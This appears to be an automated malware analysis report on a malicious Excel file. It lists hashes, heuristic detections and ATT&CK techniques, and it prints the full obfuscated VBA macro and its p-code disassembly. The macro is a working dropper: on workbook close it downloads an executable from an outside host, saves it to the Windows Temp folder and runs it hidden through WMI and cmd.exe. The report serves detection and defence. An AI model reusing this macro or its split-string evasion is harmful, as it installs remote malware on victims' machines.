Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 98917be41e446698…

MALICIOUS

Office (OLE)

510.5 KB Created: 2020-07-03 08:10:55 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 4775ebd5e313c8977865c0aa0358f79b SHA-1: 8bffb3644513b8548f2e107ad8d2707deda65f1d SHA-256: 98917be41e446698aaf1dcb464bfc27ca686c56e2636e2801e6e8c46929e5f71
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The VBA macro within the Excel file is designed to download a file from 'https://office-files.pw/Dd1239fghH/f.exe' and save it as 'C:\Windows\Temp\d.exe'. It then attempts to execute this downloaded file using 'cmd.exe' via the Win32_Process WMI object. The obfuscation techniques used, such as string concatenation for API names and URLs, indicate a deliberate attempt to evade detection.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    output.write request.responseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set request = CreateObject("Mi" + q + "LHT" + "TP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set request = CreateObject("Mi" + q + "LHT" + "TP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://office-files.pw/Dd1239fghH/f.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5285 bytes
SHA-256: 1ef8ae385ecc4ef8fe505ab9cf19721da4e6ac83ef8776c70a291b81552667bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim request
Dim q As String
q = "croso" + "ft.XM"
Set request = CreateObject("Mi" + q + "LHT" + "TP")
Dim t1 As String
t1 = "t"
Dim ff As String
ff = "pw/Dd1239fghH/f.e" + "xe"
request.Open "GET", "h" + "t" + "t" + "ps" + ":" + "/" + "/office" + "-files." + ff, False
request.Send
Dim sss As String
sss = "b" + "." + "Stream"
Set output = CreateObject("Ad" + "od" + sss)
Dim filename As String
filename = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\d" + "." + "exe"
output.Type = 1
output.Open
output.write request.responseBody
output.savetofile filename, 2
Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
Dim path As String
path = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\"
Dim p1 As String
p1 = "/h" + "id"
Dim p2 As String
p2 = "/c " + "cd"
Result = process.Create("cm" + "d.e" + "xe " + p1 + " " + p2 + " " + path + " & " + " st" + "art d.e" + "xe", Null, Null, processid)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_gkgc70d0
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3256 bytes
' Line #0:
' 	FuncDefn (Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn request
' Line #3:
' 	Dim 
' 	VarDefn q (As String)
' Line #4:
' 	LitStr 0x0005 "croso"
' 	LitStr 0x0005 "ft.XM"
' 	Add 
' 	St q 
' Line #5:
' 	SetStmt 
' 	LitStr 0x0002 "Mi"
' 	Ld q 
' 	Add 
' 	LitStr 0x0003 "LHT"
' 	Add 
' 	LitStr 0x0002 "TP"
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set request 
' Line #6:
' 	Dim 
' 	VarDefn t1 (As String)
' Line #7:
' 	LitStr 0x0001 "t"
' 	St t1 
' Line #8:
' 	Dim 
' 	VarDefn ff (As String)
' Line #9:
' 	LitStr 0x0011 "pw/Dd1239fghH/f.e"
' 	LitStr 0x0002 "xe"
' 	Add 
' 	St ff 
' Line #10:
' 	LitStr 0x0003 "GET"
' 	LitStr 0x0001 "h"
' 	LitStr 0x0001 "t"
' 	Add 
' 	LitStr 0x0001 "t"
' 	Add 
' 	LitStr 0x0002 "ps"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0001 "/"
' 	Add 
' 	LitStr 0x0007 "/office"
' 	Add 
' 	LitStr 0x0007 "-files."
' 	Add 
' 	Ld ff 
' 	Add 
' 	LitVarSpecial (False)
' 	Ld request 
' 	ArgsMemCall Open 0x0003 
' Line #11:
' 	Ld request 
' 	ArgsMemCall Send 0x0000 
' Line #12:
' 	Dim 
' 	VarDefn sss (As String)
' Line #13:
' 	LitStr 0x0001 "b"
' 	LitStr 0x0001 "."
' 	Add 
' 	LitStr 0x0006 "Stream"
' 	Add 
' 	St sss 
' Line #14:
' 	SetStmt 
' 	LitStr 0x0002 "Ad"
' 	LitStr 0x0002 "od"
' 	Add 
' 	Ld sss 
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set Output 
' Line #15:
' 	Dim 
' 	VarDefn filename (As String)
' Line #16:
' 	LitStr 0x0001 "C"
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0003 "\Wi"
' 	Add 
' 	LitStr 0x0003 "ndo"
' 	Add 
' 	LitStr 0x0002 "ws"
' 	Add 
' 	LitStr 0x0003 "\Te"
' 	Add 
' 	LitStr 0x0004 "mp\d"
' 	Add 
' 	LitStr 0x0001 "."
' 	Add 
' 	LitStr 0x0003 "exe"
' 	Add 
' 	St filename 
' Line #17:
' 	LitDI2 0x0001 
' 	Ld Output 
' 	MemSt Type 
' Line #18:
' 	Ld Output 
' 	ArgsMemCall Open 0x0000 
' Line #19:
' 	Ld request 
' 	MemLd responseBody 
' 	Ld Output 
' 	ArgsMemCall Write 0x0001 
' Line #20:
' 	Ld filename 
' 	LitDI2 0x0002 
' 	Ld Output 
' 	ArgsMemCall savetofile 0x0002 
' Line #21:
' 	SetStmt 
' 	LitStr 0x0002 "wi"
' 	LitStr 0x0004 "nmgm"
' 	Add 
' 	LitStr 0x0002 "ts"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0001 "W"
' 	Add 
' 	LitStr 0x0003 "in3"
' 	Add 
' 	LitStr 0x0001 "2"
' 	Add 
' 	LitStr 0x0001 "_"
' 	Add 
' 	LitStr 0x0002 "Pr"
' 	Add 
' 	LitStr 0x0003 "oce"
' 	Add 
' 	LitStr 0x0002 "ss"
' 	Add 
' 	ArgsLd GetObject 0x0001 
' 	Set process 
' Line #22:
' 	Dim 
' 	VarDefn path (As String)
' Line #23:
' 	LitStr 0x0001 "C"
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0003 "\Wi"
' 	Add 
' 	LitStr 0x0003 "ndo"
' 	Add 
' 	LitStr 0x0002 "ws"
' 	Add 
' 	LitStr 0x0003 "\Te"
' 	Add 
' 	LitStr 0x0003 "mp\"
' 	Add 
' 	St path 
' Line #24:
' 	Dim 
' 	VarDefn p1 (As String)
' Line #25:
' 	LitStr 0x0002 "/h"
' 	LitStr 0x0002 "id"
' 	Add 
' 	St p1 
' Line #26:
' 	Dim 
' 	VarDefn p2 (As String)
' Line #27:
' 	LitStr 0x0003 "/c "
' 	LitStr 0x0002 "cd"
' 	Add 
' 	St p2 
' Line #28:
' 	LitStr 0x0002 "cm"
' 	LitStr 0x0003 "d.e"
' 	Add 
' 	LitStr 0x0003 "xe "
' 	Add 
' 	Ld p1 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld p2 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld path 
' 	Add 
' 	LitStr 0x0003 " & "
' 	Add 
' 	LitStr 0x0003 " st"
' 	Add 
' 	LitStr 0x0007 "art d.e"
' 	Add 
' 	LitStr 0x0002 "xe"
' 	Add 
' 	LitVarSpecial (Null)
' 	LitVarSpecial (Null)
' 	Ld processid 
' 	Ld process 
' 	ArgsMemLd Create 0x0004 
' 	St Result 
' Line #29:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 991 bytes